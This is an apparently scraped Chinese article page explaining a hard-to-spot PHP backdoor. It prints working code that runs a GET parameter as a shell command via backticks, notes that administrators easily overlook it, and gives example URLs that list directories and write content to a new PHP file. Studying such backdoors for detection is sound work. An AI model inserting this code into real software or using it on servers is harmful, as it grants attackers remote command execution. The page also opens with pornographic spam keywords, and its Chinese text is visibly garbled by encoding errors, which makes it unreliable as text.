欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

一個(gè)不易被發(fā)現(xiàn)的PHP后門代碼解析

 更新時(shí)間:2014年07月05日 16:16:53   投稿:shichen2014  
這篇文章主要介紹了一個(gè)不易被發(fā)現(xiàn)的PHP后門代碼解析,對(duì)于網(wǎng)絡(luò)安全來說非常重要,需要的朋友可以參考下

偶然間看到一段,看起來似乎沒有什么問題,確是能致命的后門代碼,這里用到了一個(gè)一般的PHPer都不怎么關(guān)注的反撇號(hào) ` ,反撇號(hào)包含的字符串,等同于shell_exec函數(shù)。

偽裝性很好,很容易被管理員忽略。

$selfNums = $_GET['r'];
if (isset($selfNums)){
  echo `$selfNums`;
}

剛看到這段代碼我想大家都會(huì)說沒有問題,但是細(xì)心的朋友也會(huì)發(fā)現(xiàn)下面的變量被一個(gè)符號(hào)包起來了,既然是變量為什么要這樣了,

而且又不是單引號(hào),這個(gè)就是關(guān)鍵所在了,這個(gè)符號(hào)是 Esc 下面的一個(gè)鍵(位于感嘆號(hào)!旁邊的),

通過 echo `系統(tǒng)命令`; 可以達(dá)到 system(); 一樣的效果

如果不信的朋友可以測試

http://127.0.0.1/t.php?r=dir 可以列出目錄

http://127.0.0.1/t.php?r=echo 我是馬兒 >>D:\web\90sec.php

我用 appserv 和虛擬主機(jī)已經(jīng)測試成功。

相關(guān)文章

最新評(píng)論